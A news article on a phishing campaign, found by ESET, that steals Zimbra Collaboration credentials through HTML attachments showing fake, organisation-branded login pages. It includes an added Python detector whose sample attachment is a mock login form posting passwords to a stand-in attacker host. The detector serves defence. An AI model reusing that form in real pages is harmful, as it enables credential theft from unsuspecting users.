A long-running phishing campaign targeting small- to medium-size businesses and government entities is successfully snaring account credentials belonging to users of the Zimbra Collaboration software platform.
The campaign, carried out by an unidentified threat group, has been active since at least April and has hit targets in several countries in Europe and Latin America.
It was discovered by ESET researcher Viktor Šperka, who blogged about the company’s findings on Thursday.
“Despite this campaign not being so technically sophisticated, it is still able to spread and successfully compromise organizations that use Zimbra Collaboration, which remains an attractive target for adversaries,” Šperka wrote.
The platform’s attractiveness to threat actors stems from the expectation that organizations using it tend to have lower IT budgets and therefore less sophisticated security measures in place.
Users duped by fake Zimbra login page
The campaign involves sending targets a malicious email purportedly warning of an account deactivation, email server update, or a similar issue. The email includes an attached HTML file which, when opened, presents the user with a fake Zimbra login page. The page is customized with the name and logo of the victim’s organization.
The "Username" field of the login form is pre-filled with the target’s details, “which makes it appear more legitimate,” Šperka said in his post.
Credentials submitted on the fake page are collected from the HTML form and sent to a server controlled by the threat actor.
“Then, the attacker is potentially able to infiltrate the affected email account,” Šperka said.
“It is likely that the attackers were able to compromise the victim’s administrator accounts and created new mailboxes that were then used to send phishing emails to other targets.”
Including a malicious link in an HTML file, rather than placing it in the body of the email, made it easier to circumvent reputation-based antispam policies, Šperka said.
“Adversaries leverage the fact that HTML attachments contain legitimate code, and the only telltale element is a link pointing to the malicious host.”
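The attachment described above can be triaged mechanically: the HTML is otherwise legitimate, so the thing to look for is a form that asks for a password and posts it to a host outside the organization, plus any other external host the file references. The following is an added example written for this article, not ESET’s detection logic or anything from the campaign; the sample attachment, the `example.org` organization domain and the `collector.invalid` hostname are all constructed.

```python
"""Inspect an HTML e-mail attachment for a credential-harvesting login form.

Added example for this article; it is not ESET's detection logic. The
sample page below is constructed: example.org stands in for the victim
organisation and collector.invalid for the attacker's server. Standard
library only, so it runs offline.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for the fake Zimbra login attachment described in
# the article: the org's own logo, a pre-filled username, and a form that
# posts the password somewhere else.
SAMPLE_ATTACHMENT = """<html><body>
<img src="https://mail.example.org/skins/logo.png">
<h1>Zimbra Web Client - Example Org</h1>
<form action="https://collector.invalid/zimbra/auth.php" method="post">
  <input type="text" name="username" value="j.doe@example.org">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form>
</body></html>"""

ORG_DOMAINS = ["example.org"]  # assumed: domains the organisation legitimately uses


class FormCollector(HTMLParser):
    """Collect every <form> with its inputs, plus every URL the page references."""

    def __init__(self):
        super().__init__()
        self.forms = []      # [{"action": str, "inputs": [attr dicts]}]
        self.urls = []       # every href/src/action attribute value seen
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        for key in ("href", "src", "action"):
            if a.get(key):
                self.urls.append(a[key])
        if tag == "form":
            self._current = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def is_internal(host, org_domains):
    """True if host is one of the org's domains or a subdomain of one."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in org_domains)


def analyse_attachment(html, org_domains=ORG_DOMAINS):
    """Return {"form_findings": [...], "external_hosts": [...]}.

    A form finding is raised for any form containing a password field whose
    action does not resolve to one of the org's own hosts. Pre-filled
    non-secret fields (the personalised username) are reported alongside it.
    """
    parser = FormCollector()
    parser.feed(html)
    form_findings = []

    for form in parser.forms:
        types = {i.get("type", "text").lower() for i in form["inputs"]}
        if "password" not in types:
            continue  # not a login form; nothing to harvest
        host = urlparse(form["action"]).hostname or ""
        prefilled = [i["value"] for i in form["inputs"]
                     if i.get("type", "text").lower() not in ("password", "submit", "hidden")
                     and i.get("value")]
        if not host:
            kind = "password_form_relative_action"   # posts nowhere sensible from a file
        elif not is_internal(host, org_domains):
            kind = "password_form_posts_externally"  # the credential-theft signature
        else:
            continue
        form_findings.append({"kind": kind, "host": host, "prefilled": prefilled})

    # The only telltale element in an otherwise legitimate page: external hosts.
    hosts = {urlparse(u).hostname for u in parser.urls}
    external_hosts = sorted(h for h in hosts if h and not is_internal(h, org_domains))
    return {"form_findings": form_findings, "external_hosts": external_hosts}


if __name__ == "__main__":
    result = analyse_attachment(SAMPLE_ATTACHMENT)
    for finding in result["form_findings"]:
        print("FORM:", finding)
    print("EXTERNAL HOSTS:", result["external_hosts"])
```

On a real mail gateway the same check would run over each `text/html` attachment before delivery, with `ORG_DOMAINS` populated from the tenant’s accepted domains; a password form whose action host is not on that list is a strong signal regardless of whether the host has any reputation yet, which is exactly the gap the attachment trick exploits.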
Humans are (often) the weakest link
“The campaign observed by ESET relies only on social engineering and user interaction; however, this may not always be the case,” he said.
In March, Proofpoint described another attack against Zimbra Collaboration instances where threat group Winter Vivern used a known vulnerability (CVE-2022-2792) to target webmail portals of NATO-aligned governments in Europe.
Last month, EclecticIQ researchers identified a spearphishing campaign that had been running since January and was exploiting Zimbra and Roundcube email servers to target government organizations.
Šperka said that campaign was similar to the one he discovered. “The main difference is that the HTML link leading to the fake Zimbra login page is located directly in the email body.”
In the latest campaign, ESET telemetry indicated the greatest number of targets were located in Poland, followed by Ecuador and Italy. Organizations in Ukraine, France and the Netherlands were also targeted.
“Target organizations vary: adversaries do not focus on any specific vertical with the only thing connecting victims being that they are using Zimbra,” Šperka wrote.